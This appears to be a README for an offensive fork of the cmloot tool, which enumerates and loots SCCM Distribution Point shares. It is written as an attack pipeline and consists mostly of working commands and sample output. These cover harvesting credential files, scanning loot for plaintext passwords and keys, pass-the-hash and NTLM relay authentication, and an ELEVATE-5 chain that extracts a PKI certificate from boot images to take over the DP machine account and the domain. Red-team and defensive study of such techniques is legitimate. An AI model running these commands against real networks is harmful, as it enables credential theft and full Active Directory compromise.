cmloot — Forked, Extended, and Weaponized
This is a fork of shelltrail/cmloot by Andreas Vikerup. The original connects to an SCCM Distribution Point over SMB, traverses SCCMContentLib$, and downloads files by extension — a solid foundation. This fork builds on that foundation with six additions that turn a file grabber into a complete offensive pipeline: BFS inventory with progress, interactive download selection, an auto-discover-to-classify pipeline, offline file classification, credential deep analysis, and ELEVATE-5 DP takeover support. Here is what changed and why each addition matters in the field.
| Capability | Original | Fork |
|---|---|---|
| SMB traversal & download | Yes | Yes (improved) |
| LDAP discovery | Yes | Yes + multi-target merge |
| Progress / ETA | No | BFS with progress bars |
| Interactive file selection | Download all | Pick files by number/range |
| Auto pipeline | No | -auto (discover → loot → classify) |
| File classification | No | Category + [!] priority markers |
| Credential analysis | No | cmloot_analyze.py (severity-rated) |
| ELEVATE-5 extraction | No | -elevate5 (Variables.dat from WIM) |
| PtH / Kerberos / relay | Yes | Yes (cleaner args) |
BFS Inventory with Progress
When you are enumerating a share with thousands of files, sitting in silence for minutes with no feedback is stressful. The original walks SCCMContentLib$ sequentially and gives you a single "created" message. This fork uses BFS traversal with per-directory progress bars, running file counts, and an ETA so you can tell whether the tool is still working or has hung on a timeout.
[+] Access to SCCMContentLib on sccm01 [+] sccmfiles.txt created
[+] Access to SCCMContentLib on sccm01 [*] Traversing DataLib... ████████████████ 100% (2,847 files) [*] Traversing FileLib... ██████████████░░ 82% (1,204 files, ETA 0:03) [+] sccmfiles.txt created (4,051 entries)
Interactive Download Selection
The original downloads every file matching your extension list. In practice this means pulling a 4.5 GB install.wim that does not contain any task sequence variables — wasted time and bandwidth. The fork shows you exactly what is available before you download: file size, category, and a [!] marker for high-value targets. You pick by number or range, and skip the noise.
================================================================
DOWNLOAD SELECTION: 4 files available
================================================================
# Size Category File
--- --- --- ---
1 280KB OSD MEDIA (ELEVATE-5) boot.BHS00012.wim [!]
2 312MB OSD MEDIA (ELEVATE-5) boot.BHS00009.wim [!]
3 15KB CREDENTIALS BHS-MigApp.xml [!]
4 4.5GB OSD MEDIA (install) install.wim
Total: 4.8GB across 4 files
Select files to download:
Numbers: 1,3 Ranges: 1-3 A = all Q = quit
Choice [A]: 1,2,3
[+] Downloading boot.BHS00012.wim (280KB)...
[+] Downloading boot.BHS00009.wim (312MB)...
[+] Downloading BHS-MigApp.xml (15KB)...
[+] Done. 3 files downloaded, 1 skipped (312.3MB total)
Auto Pipeline
Normally you run three separate commands: discover SCCM servers, build an inventory, then download. The -auto flag chains those steps together — LDAP discovery, BFS inventory, interactive download, and offline classification in a single pass. It also handles multi-target enumeration with automatic dedup, so you can point it at a domain controller and walk away.
$ python3 cmloot.py corp.local/user:pass@dc01 -auto [+] LDAP discovery: found 2 SCCM servers [+] Inventorying SCCM01... ████████████████ 100% [+] Inventorying SCCM02... ████████████████ 100% [+] Merged inventory: 6,120 files (deduped) [*] Downloading high-value files... [+] Downloaded boot.BHS00012.wim (280KB) [OSD MEDIA] [+] Downloaded BHS-MigApp.xml (15KB) [CREDENTIALS] [+] Downloaded C7F4-MigApp.xml (22KB) [CREDENTIALS] [+] Classifying downloaded files... [+] Done. 3 files downloaded, 6,117 skipped.
File Classification
When you have downloaded hundreds of files, finding the two that actually matter is tedious. The fork classifies every file offline — credentials, OSD media, configuration, migration data — and marks high-value targets with [!] so you can immediately pivot instead of sifting through generic XML by hand.
$ python3 cmloot.py -classify
================================================================
CLASSIFIED LOOT — CMLootOut/
================================================================
[!] CREDENTIALS
BHS-MigApp.xml 15KB [CRITICAL]
C7F4-MigApp.xml 22KB [CRITICAL]
[!] OSD MEDIA (ELEVATE-5)
boot.BHS00012.wim 280KB [HIGH]
boot.BHS00009.wim 312MB [HIGH]
prestaged.wim 8MB [HIGH]
[i] CONFIGURATION
F906-ep_defaultpolicy.xml 4KB [MEDIUM]
D204-Config_AppsAndSettings.xml 8KB [LOW]
[i] MIGRATION
CF90-MigDocs.xml 12KB [LOW]
E67A-MigUser.xml 9KB [LOW]
Credential Analysis — cmloot_analyze.py
This is something the original does not have. cmloot_analyze.py is a separate deep content scanner that runs over your downloaded loot and surfaces plaintext passwords, PSCredential usage, connection strings with embedded credentials, private keys, API tokens, LDAP paths, and service accounts. It filters noise (GUIDs, Microsoft schema URLs, empty values), deduplicates per file, and rates every finding by severity: CRITICAL, HIGH, or MEDIUM. Output can be JSON for pipeline integration.
$ python3 cmloot_analyze.py CMLootOut/ --severity CRITICAL HIGH
[CRITICAL] BHS-MigApp.xml
├─ Cleartext password: password="W1nt3rM4nt1s!"
├─ Connection string: Server=SCCMDB01.corp.local;User ID=sccm_sa;Password=...
└─ Network Access Account: CORP\svc-sccm-naa
[CRITICAL] C7F4-MigApp.xml
├─ PSCredential / SecureString usage detected
└─ Private key material (RSA 2048)
[HIGH] F906-ep_defaultpolicy.xml
├─ LDAP bind path: LDAP://OU=Workstations,DC=corp,DC=local
└─ SCCM site code: BHS
Summary: 4 CRITICAL, 2 HIGH, 1 MEDIUM
ELEVATE-5: Distribution Point Takeover
SCCM Distribution Points that use PKI certificates embed them in OSD boot images as _SMSTSMediaPFX. The certificate has Client Authentication EKU with an exportable private key. The fork adds -elevate5 to extract Variables.dat from downloaded WIM boot images. Combine this with PXEThief to decrypt the embedded certificate, then authenticate as the DP machine account via Certipy. That is full AD compromise from a single misconfigured Distribution Point.
Step 1: Download boot images $ python3 cmloot.py corp.local/user@sccm01 -extensions WIM ISO Step 2: Extract Variables.dat from boot WIM $ python3 cmloot.py -elevate5 ┌──────────────────────────────────────────────────┐ │ ELEVATE-5: PKI Certificate Recovery │ │ ─────────────────────────────────────────────── │ │ [+] boot.BHS00012.wim (280KB) │ │ Extracting Variables.dat... OK │ │ Found: _SMSTSMediaPFX certificate │ │ EKU: Client Authentication │ │ Key: Exportable │ │ │ │ [-] boot.BHS00009.wim — no Variables.dat found │ │ [-] install.wim — skipped (not a boot image) │ └──────────────────────────────────────────────────┘ Step 3: Decrypt certificate with PXEThief $ python3 pxethief.py 3 Variables.dat Step 4: Authenticate as DP machine account $ certipy auth -pfx sccm01.pfx
Boot images (boot.*.wim, prestaged.wim) contain Variables.dat. Install images (install.wim) do not. The interactive download in this fork lets you skip the 4.5 GB noise and grab the 280 KB target.
Authentication Options
The fork carries over all auth methods from upstream with cleaner argument handling: password, pass-the-hash, computer account, Kerberos, and NTLM relay via proxychains.
# Password auth
python3 cmloot.py corp.local/user:pass@sccm01 -cmlootinventory out.txt
# Pass-the-hash
python3 cmloot.py corp.local/user@sccm01 -cmlootinventory out.txt \
-hashes :fc525c9683e8fe067095ba14f29e5f5c
# Computer account
python3 cmloot.py corp.local/WORKSTN$@sccm01 -cmlootinventory out.txt \
-hashes :fc525c9683e8fe067095ba14f29e5f5c -no-pass
# Kerberos
python3 cmloot.py corp.local/user@sccm01 -k -dc-ip 10.0.0.1
# NTLM relay via proxychains
ntlmrelayx.py -socks -t 10.0.0.50 -smb2support
proxychains python3 cmloot.py CORP/WORKSTN$@10.0.0.50 -n \
-cmlootdownload out.txt
Same SMB traversal core at the foundation, with an extended offensive surface on top. The fork is a drop-in replacement — all upstream workflows still work, and every new feature is opt-in via flags.